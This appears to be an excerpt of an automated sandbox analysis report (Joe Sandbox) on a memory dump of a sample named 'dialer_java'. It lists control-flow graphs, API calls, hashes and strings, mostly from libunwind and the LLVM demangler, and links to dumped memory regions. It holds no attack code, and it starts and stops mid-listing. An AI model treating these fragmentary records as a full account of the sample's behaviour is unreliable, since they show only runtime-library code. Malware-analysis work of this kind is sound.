7ff6e3a76ae3-7ff6e3a76ae6 1111->1122 1120 7ff6e3a76a77-7ff6e3a76a82 malloc 1112->1120 1121 7ff6e3a76a61-7ff6e3a76a70 realloc 1112->1121 1114->1049 1114->1056 1123 7ff6e3a768cb-7ff6e3a768da realloc 1115->1123 1124 7ff6e3a76996-7ff6e3a769a1 malloc 1115->1124 1129 7ff6e3a76b59-7ff6e3a76b5c 1116->1129 1125 7ff6e3a76b30-7ff6e3a76b39 1117->1125 1118->1033 1119->1118 1120->1061 1128 7ff6e3a76a88-7ff6e3a76a8e 1120->1128 1126 7ff6e3a76aa2-7ff6e3a76ac7 1121->1126 1127 7ff6e3a76a72 1121->1127 1122->1093 1130 7ff6e3a76aec-7ff6e3a76aef 1122->1130 1123->1061 1134 7ff6e3a768e0-7ff6e3a76905 1123->1134 1124->1061 1131 7ff6e3a769a7-7ff6e3a769ad 1124->1131 1132 7ff6e3a76b3b-7ff6e3a76b44 1125->1132 1133 7ff6e3a76b49-7ff6e3a76b4f 1125->1133 1126->1111 1127->1061 1135 7ff6e3a76a90-7ff6e3a76a99 memcpy 1128->1135 1136 7ff6e3a76a9e 1128->1136 1137 7ff6e3a76b62-7ff6e3a76b65 1129->1137 1138 7ff6e3a76c11 1129->1138 1130->1097 1139 7ff6e3a769bd-7ff6e3a769c1 1131->1139 1140 7ff6e3a769af-7ff6e3a769b8 memcpy 1131->1140 1132->1125 1141 7ff6e3a76b46 1132->1141 1133->1129 1134->1114 1135->1136 1136->1126 1137->1138 1142 7ff6e3a76b6b-7ff6e3a76b89 1137->1142 1138->1105 1139->1134 1140->1139 1141->1133 1143 7ff6e3a76b8b-7ff6e3a76b98 malloc 1142->1143 1144 7ff6e3a76bb5-7ff6e3a76c0f 1142->1144 1143->1061 1145 7ff6e3a76b9e-7ff6e3a76bb2 1143->1145 1144->1105 1145->1144
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$memcpyrealloc$_assert$freememchr
                                      • String ID: 'block-literal'$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Popping empty vector!"$Parser->TemplateParams.size() >= OldNumTemplateParamLists$yptn
                                      • API String ID: 3787261664-3461159648
                                      • Opcode ID: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction ID: 2eabe8cce145a44d6fca95da0e5c3f4bf4efa98aff464b751c449cb0ed1dcccc
                                      • Opcode Fuzzy Hash: 57f0d196df13843cdacfecd0714ebaf0385c5284f1a26d2321f516d71d41b19e
                                      • Instruction Fuzzy Hash: 3622B233709B8281EA248F29E4853BA7BA4FB45B84F054235DA9D577E9EF3DE481C305

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1526 7ff6e3a6a480-7ff6e3a6a49f call 7ff6e3a654a0 1529 7ff6e3a6a4b4-7ff6e3a6a4b7 1526->1529 1530 7ff6e3a6a4a1-7ff6e3a6a4ad 1526->1530 1533 7ff6e3a6a4b9 1529->1533 1534 7ff6e3a6a4bf-7ff6e3a6a4c1 1529->1534 1531 7ff6e3a6a4c6-7ff6e3a6a721 strlen 1530->1531 1532 7ff6e3a6a4af-7ff6e3a6a4b2 1530->1532 1536 7ff6e3a6a77d-7ff6e3a6a794 call 7ff6e3a6ba60 1531->1536 1537 7ff6e3a6a723-7ff6e3a6a72d 1531->1537 1532->1529 1532->1531 1533->1534 1535 7ff6e3a6ab4c-7ff6e3a6ab62 1534->1535 1544 7ff6e3a6a79a-7ff6e3a6a7a1 1536->1544 1545 7ff6e3a6a9cf-7ff6e3a6a9d2 1536->1545 1539 7ff6e3a6a7a6-7ff6e3a6a7ab 1537->1539 1540 7ff6e3a6a72f-7ff6e3a6a733 1537->1540 1542 7ff6e3a6a7b2-7ff6e3a6a7cf call 7ff6e3a6ad10 1539->1542 1540->1536 1543 7ff6e3a6a735-7ff6e3a6a74a 1540->1543 1559 7ff6e3a6a7d5-7ff6e3a6a7e2 1542->1559 1560 7ff6e3a6a8a0-7ff6e3a6a8a2 1542->1560 1547 7ff6e3a6a74c-7ff6e3a6a750 1543->1547 1548 7ff6e3a6a7ad 1543->1548 1550 7ff6e3a6aabd-7ff6e3a6aac0 1544->1550 1545->1544 1549 7ff6e3a6a9d8-7ff6e3a6a9db 1545->1549 1547->1536 1552 7ff6e3a6a752-7ff6e3a6a759 1547->1552 1548->1542 1557 7ff6e3a6a9dd-7ff6e3a6a9e0 1549->1557 1558 7ff6e3a6a9e2 1549->1558 1555 7ff6e3a6aac4-7ff6e3a6aacf 1550->1555 1556 7ff6e3a6aac2 1550->1556 1553 7ff6e3a6a8be-7ff6e3a6a8c3 1552->1553 1554 7ff6e3a6a75f-7ff6e3a6a763 1552->1554 1565 7ff6e3a6a8ca-7ff6e3a6a8e4 call 7ff6e3a6ad10 1553->1565 1554->1536 1561 7ff6e3a6a765-7ff6e3a6a777 1554->1561 1562 7ff6e3a6ab7c-7ff6e3a6ab8a 1555->1562 1563 7ff6e3a6aad5-7ff6e3a6aaf8 1555->1563 1556->1555 1564 7ff6e3a6a9e4-7ff6e3a6aa18 1557->1564 1558->1564 1566 7ff6e3a6a88b-7ff6e3a6a89b 1559->1566 1567 7ff6e3a6a7e8-7ff6e3a6a7ed 1559->1567 1560->1550 1561->1536 1570 7ff6e3a6a8c5 1561->1570 1568 7ff6e3a6ab8c-7ff6e3a6ab99 free 1562->1568 1569 7ff6e3a6ab70-7ff6e3a6ab76 1562->1569 1571 7ff6e3a6aafa free 1563->1571 1572 7ff6e3a6aaff-7ff6e3a6ab12 1563->1572 1573 7ff6e3a6ab9b-7ff6e3a6abaf _assert 1564->1573 1574 7ff6e3a6aa1e-7ff6e3a6aa3c 1564->1574 1588 7ff6e3a6a91c-7ff6e3a6a922 1565->1588 1589 7ff6e3a6a8e6-7ff6e3a6a8fa 1565->1589 1566->1549 1576 7ff6e3a6a8a7-7ff6e3a6a8b9 1567->1576 1577 7ff6e3a6a7f3-7ff6e3a6a80c 1567->1577 1568->1569 1569->1562 1569->1563 1570->1565 1571->1572 1579 7ff6e3a6ab19-7ff6e3a6ab24 1572->1579 1580 7ff6e3a6ab14 free 1572->1580 1578 7ff6e3a6abb5-7ff6e3a6abd1 call 7ff6e3a62d30 call 7ff6e3a6abe0 call 7ff6e3a63f50 1573->1578 1592 7ff6e3a6aa53-7ff6e3a6aa69 1574->1592 1593 7ff6e3a6aa3e-7ff6e3a6aa4a 1574->1593 1576->1550 1582 7ff6e3a6a839-7ff6e3a6a886 1577->1582 1583 7ff6e3a6a80e-7ff6e3a6a81b malloc 1577->1583 1586 7ff6e3a6ab2b-7ff6e3a6ab36 1579->1586 1587 7ff6e3a6ab26 free 1579->1587 1580->1579 1582->1566 1583->1578 1590 7ff6e3a6a821-7ff6e3a6a836 1583->1590 1594 7ff6e3a6ab3d-7ff6e3a6ab45 1586->1594 1595 7ff6e3a6ab38 free 1586->1595 1587->1586 1588->1549 1597 7ff6e3a6a928 1588->1597 1589->1588 1596 7ff6e3a6a8fc-7ff6e3a6a91a 1589->1596 1590->1582 1599 7ff6e3a6aa6b-7ff6e3a6aa91 realloc 1592->1599 1600 7ff6e3a6aaa0-7ff6e3a6aaac 1592->1600 1593->1592 1594->1535 1602 7ff6e3a6ab47 free 1594->1602 1595->1594 1596->1588 1601 7ff6e3a6a92d-7ff6e3a6a939 1596->1601 1597->1544 1599->1578 1604 7ff6e3a6aa97-7ff6e3a6aa9c 1599->1604 1605 7ff6e3a6aab6-7ff6e3a6aabb 1600->1605 1606 7ff6e3a6aaae-7ff6e3a6aab3 1600->1606 1607 7ff6e3a6a93b-7ff6e3a6a941 1601->1607 1608 7ff6e3a6a9b6-7ff6e3a6a9cc call 7ff6e3a6b9a0 1601->1608 1602->1535 1604->1600 1605->1550 1606->1605 1611 7ff6e3a6a943-7ff6e3a6a94c 1607->1611 1612 7ff6e3a6a94f-7ff6e3a6a955 1607->1612 1608->1545 1611->1612 1613 7ff6e3a6a957-7ff6e3a6a963 1612->1613 1614 7ff6e3a6a992 1612->1614 1617 7ff6e3a6a995-7ff6e3a6a998 1613->1617 1618 7ff6e3a6a965 1613->1618 1614->1617 1621 7ff6e3a6a99a-7ff6e3a6a99d 1617->1621 1622 7ff6e3a6a9a3-7ff6e3a6a9a6 1617->1622 1620 7ff6e3a6a968-7ff6e3a6a974 1618->1620 1623 7ff6e3a6a986-7ff6e3a6a990 1620->1623 1624 7ff6e3a6a976-7ff6e3a6a981 1620->1624 1621->1588 1621->1622 1622->1608 1625 7ff6e3a6a9a8-7ff6e3a6a9ab 1622->1625 1623->1617 1624->1620 1626 7ff6e3a6a983 1624->1626 1625->1588 1627 7ff6e3a6a9b1 1625->1627 1626->1623 1627->1608
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: free$mallocreallocstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_demangle.cpp$Parser.ForwardTemplateRefs.empty()$___Z$____$_block_i$invocation function for block in $k_invoke
                                      • API String ID: 3545345670-2202808109
                                      • Opcode ID: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
                                      • Instruction ID: d09e21ef12961e8662e6d5aa357cb9af687fc91c2ad437d5aad247f8498f8684
                                      • Opcode Fuzzy Hash: 861c98a3b672e6a2a383b269d5275672217222fa8a2771e2f6aeb1d11a5c4d7e
                                      • Instruction Fuzzy Hash: E012AC63A1DBC281EB718F08E4553FABBA4EB94750F104231EA8D52A94EF7ED5C1CB05
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$strlen
                                      • String ID: objcprot
                                      • API String ID: 832207080-2390413308
                                      • Opcode ID: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction ID: cf63f71301cc327ab38e5b634ad9f01554a151dd3665b5ad329f0fad37ecd153
                                      • Opcode Fuzzy Hash: be403558d5c19889a774bf8358e63478aaf42b095cca7af1ba9038f461d2711f
                                      • Instruction Fuzzy Hash: 8B02F333709B8181EB258B28E4857A97BA4EB04B94F454331DFAC573D9DF39E5A2C309
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction ID: b7c4e55b2dbc41e49bac922fe71889640647f26a64f3ca18c2d94b6fd24e2bda
                                      • Opcode Fuzzy Hash: d54b64b8036d404a69da6403a70ed05ca69e7b2365ca9259877c42ed947f1859
                                      • Instruction Fuzzy Hash: 6D22E233709B8185EB258B18E0893AD3BA8FB44B80F584239DB9D573D5DF39E592C319
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID:
                                      • API String ID: 2803490479-0
                                      • Opcode ID: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
                                      • Instruction ID: 8c277a2c7f254ed266284155c8831d5de2c305799f82cd17a9b735564d77625a
                                      • Opcode Fuzzy Hash: 32b5085e0174258fcd89abbd63f116b3600349e14776db4c38fcb73417ec8c35
                                      • Instruction Fuzzy Hash: 9EE1F373719B8245EF24CB18D4867B92BA4EB44B80F084171CE4CAB7D9EF7DE591830A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: %LaL
                                      • API String ID: 2500458235-3433341929
                                      • Opcode ID: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
                                      • Instruction ID: 98d85f4d923cc0e85b063a11eb219d85e3d52ca7e46b3b0346974fcbc1300c01
                                      • Opcode Fuzzy Hash: 7881fc66a91655c0b7561184f9a0693de23a3cc8bf37a0c9a732274ca51f79a1
                                      • Instruction Fuzzy Hash: D7916B6BB1C6E116EB394339F550F9D2E60C7A2762F059315CBB403F9AD92FC2168B05

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1146 7ff6e3a64120-7ff6e3a64159 call 7ff6e3a68350 call 7ff6e3a687f0 1151 7ff6e3a64413-7ff6e3a6441a call 7ff6e3a68a70 1146->1151 1152 7ff6e3a6415f-7ff6e3a64173 1146->1152 1158 7ff6e3a6444d-7ff6e3a64467 1151->1158 1159 7ff6e3a6441c-7ff6e3a64448 call 7ff6e3a63d60 fflush 1151->1159 1153 7ff6e3a64198-7ff6e3a641ae call 7ff6e3a68880 call 7ff6e3a68a70 1152->1153 1164 7ff6e3a6437a-7ff6e3a6437c 1153->1164 1165 7ff6e3a641b4-7ff6e3a641b6 1153->1165 1161 7ff6e3a64470-7ff6e3a64484 1158->1161 1159->1158 1164->1161 1167 7ff6e3a64382-7ff6e3a64394 1164->1167 1168 7ff6e3a641b8-7ff6e3a641d0 call 7ff6e3a689b0 1165->1168 1169 7ff6e3a64232-7ff6e3a6425f call 7ff6e3a68a70 1165->1169 1177 7ff6e3a643b5-7ff6e3a643bb call 7ff6e3a63d60 1167->1177 1178 7ff6e3a641e6 1168->1178 1179 7ff6e3a641d2-7ff6e3a641e4 1168->1179 1183 7ff6e3a6428c-7ff6e3a6428f 1169->1183 1184 7ff6e3a64261-7ff6e3a64287 call 7ff6e3a63d60 fflush 1169->1184 1186 7ff6e3a643c0-7ff6e3a643d3 fflush 1177->1186 1181 7ff6e3a641ed-7ff6e3a641f4 call 7ff6e3a68a70 1178->1181 1179->1178 1179->1181 1181->1169 1192 7ff6e3a641f6-7ff6e3a6422d call 7ff6e3a63d60 fflush 1181->1192 1188 7ff6e3a64396-7ff6e3a6439d call 7ff6e3a68a70 1183->1188 1189 7ff6e3a64295-7ff6e3a6429d 1183->1189 1184->1183 1186->1161 1188->1161 1201 7ff6e3a643a3-7ff6e3a643ae 1188->1201 1193 7ff6e3a64188-7ff6e3a64192 call 7ff6e3a687f0 1189->1193 1194 7ff6e3a642a3-7ff6e3a642aa call 7ff6e3a68a70 1189->1194 1192->1169 1193->1151 1193->1153 1205 7ff6e3a642ac-7ff6e3a642d2 call 7ff6e3a63d60 fflush 1194->1205 1206 7ff6e3a642d7-7ff6e3a642f8 1194->1206 1201->1177 1205->1206 1214 7ff6e3a642fa-7ff6e3a64300 1206->1214 1215 7ff6e3a64340-7ff6e3a64347 call 7ff6e3a68a70 1206->1215 1219 7ff6e3a64306-7ff6e3a6430d call 7ff6e3a68a70 1214->1219 1220 7ff6e3a643d8-7ff6e3a643dc 1214->1220 1228 7ff6e3a6434d-7ff6e3a64375 call 7ff6e3a63d60 fflush 1215->1228 1229 7ff6e3a64180-7ff6e3a64183 call 7ff6e3a68920 1215->1229 1219->1193 1234 7ff6e3a64313-7ff6e3a6433b call 7ff6e3a63d60 fflush 1219->1234 1221 7ff6e3a643e2-7ff6e3a643e9 call 7ff6e3a68a70 1220->1221 1222 7ff6e3a64485-7ff6e3a6448c call 7ff6e3a68a70 1220->1222 1221->1151 1235 7ff6e3a643eb-7ff6e3a6440e call 7ff6e3a63d60 fflush 1221->1235 1222->1161 1236 7ff6e3a6448e-7ff6e3a644ae call 7ff6e3a63d60 1222->1236 1228->1229 1229->1193 1234->1193 1235->1151 1236->1186
                                      APIs
                                      Strings
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT, xrefs: 00007FF6E3A64357
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx, xrefs: 00007FF6E3A64214
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK, xrefs: 00007FF6E3A643F2
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR, xrefs: 00007FF6E3A64499
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d, xrefs: 00007FF6E3A6426B
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK, xrefs: 00007FF6E3A6442B
                                      • .anonymous., xrefs: 00007FF6E3A641E6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK, xrefs: 00007FF6E3A6438D
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p, xrefs: 00007FF6E3A642B6
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND, xrefs: 00007FF6E3A6431D
                                      • libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function, xrefs: 00007FF6E3A643AE
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush$CaptureContextgetenv
                                      • String ID: .anonymous.$libunwind: unwind_phase2_forced(ex_ojb=%p): __unw_get_proc_info failed => _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): calling personality function %p$libunwind: unwind_phase2_forced(ex_ojb=%p): calling stop function with _UA_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned %d, _URC_FATAL_PHASE2_ERROR$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_CONTINUE_UNWIND$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_END_OF_STACK$libunwind: unwind_phase2_forced(ex_ojb=%p): personality returned _URC_INSTALL_CONTEXT$libunwind: unwind_phase2_forced(ex_ojb=%p): start_ip=0x%llx, func=%s, lsda=0x%llx, personality=0x%llx$libunwind: unwind_phase2_forced(ex_ojb=%p): stop function returned %d$libunwind: unwind_phase2_forced(ex_ojb=%p): stopped by stop function
                                      • API String ID: 3501801798-3031193476
                                      • Opcode ID: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction ID: afc2d264f852b62f6b0b3e01289ffe330833388af6764c87bee00310b474df28
                                      • Opcode Fuzzy Hash: 2c2042e08bbac2c23237b96d70b7f4566f0efbb0a5ba3dd869ebdfe9a7cb8860
                                      • Instruction Fuzzy Hash: 7081B212B1D24241FA14A76EA80B3B96B59AF52BC4F400039DE4EB73C3DE2FE581424F

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1417 7ff6e3a63820-7ff6e3a63846 call 7ff6e3a68a70 1420 7ff6e3a63848-7ff6e3a6387d call 7ff6e3a63d60 fflush 1417->1420 1421 7ff6e3a63882-7ff6e3a6388a 1417->1421 1420->1421 1422 7ff6e3a638bb-7ff6e3a638c8 1421->1422 1423 7ff6e3a6388c-7ff6e3a63897 1421->1423 1426 7ff6e3a638ca-7ff6e3a638ce 1422->1426 1427 7ff6e3a638f6-7ff6e3a63a09 memcpy 1422->1427 1424 7ff6e3a6389d-7ff6e3a638a1 1423->1424 1425 7ff6e3a63c25-7ff6e3a63c38 1423->1425 1424->1425 1429 7ff6e3a638a7-7ff6e3a638b6 1424->1429 1426->1427 1430 7ff6e3a638d0-7ff6e3a638d7 1426->1430 1431 7ff6e3a63a0b-7ff6e3a63a17 call 7ff6e3a64a70 1427->1431 1432 7ff6e3a63a19 1427->1432 1429->1425 1430->1427 1435 7ff6e3a638d9-7ff6e3a638eb call 7ff6e3a68a70 1430->1435 1431->1432 1434 7ff6e3a63a21-7ff6e3a63a9d call 7ff6e3a686c0 1431->1434 1432->1434 1444 7ff6e3a63aa3-7ff6e3a63ac2 call 7ff6e3a68a70 1434->1444 1445 7ff6e3a63bb5-7ff6e3a63bd2 call 7ff6e3a68a70 1434->1445 1446 7ff6e3a63ac4-7ff6e3a63b05 call 7ff6e3a63d60 fflush 1435->1446 1447 7ff6e3a638f1 1435->1447 1444->1446 1450 7ff6e3a63b0a-7ff6e3a63b2f call 7ff6e3a68a70 1444->1450 1445->1446 1454 7ff6e3a63bd8 1445->1454 1446->1450 1447->1450 1460 7ff6e3a63b62-7ff6e3a63b66 1450->1460 1461 7ff6e3a63b31-7ff6e3a63b5d call 7ff6e3a63d60 fflush 1450->1461 1454->1450 1463 7ff6e3a63b6c-7ff6e3a63b70 1460->1463 1464 7ff6e3a63c16-7ff6e3a63c1f 1460->1464 1461->1460 1467 7ff6e3a63bdd-7ff6e3a63be1 1463->1467 1468 7ff6e3a63b72-7ff6e3a63b78 1463->1468 1464->1425 1466 7ff6e3a63cb6-7ff6e3a63cba 1464->1466 1469 7ff6e3a63cbc-7ff6e3a63ce7 1466->1469 1470 7ff6e3a63d15-7ff6e3a63d31 1466->1470 1472 7ff6e3a63c39-7ff6e3a63cb4 call 7ff6e3a68600 * 3 1467->1472 1473 7ff6e3a63be3-7ff6e3a63bec 1467->1473 1468->1425 1474 7ff6e3a63b7e-7ff6e3a63b87 1468->1474 1475 7ff6e3a63cea-7ff6e3a63d13 RtlUnwindEx 1469->1475 1485 7ff6e3a63d38-7ff6e3a63d54 call 7ff6e3a63d60 fflush abort 1470->1485 1472->1475 1473->1425 1477 7ff6e3a63bee-7ff6e3a63c11 1473->1477 1474->1425 1479 7ff6e3a63b8d-7ff6e3a63bb0 1474->1479 1475->1485 1477->1485 1479->1485
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
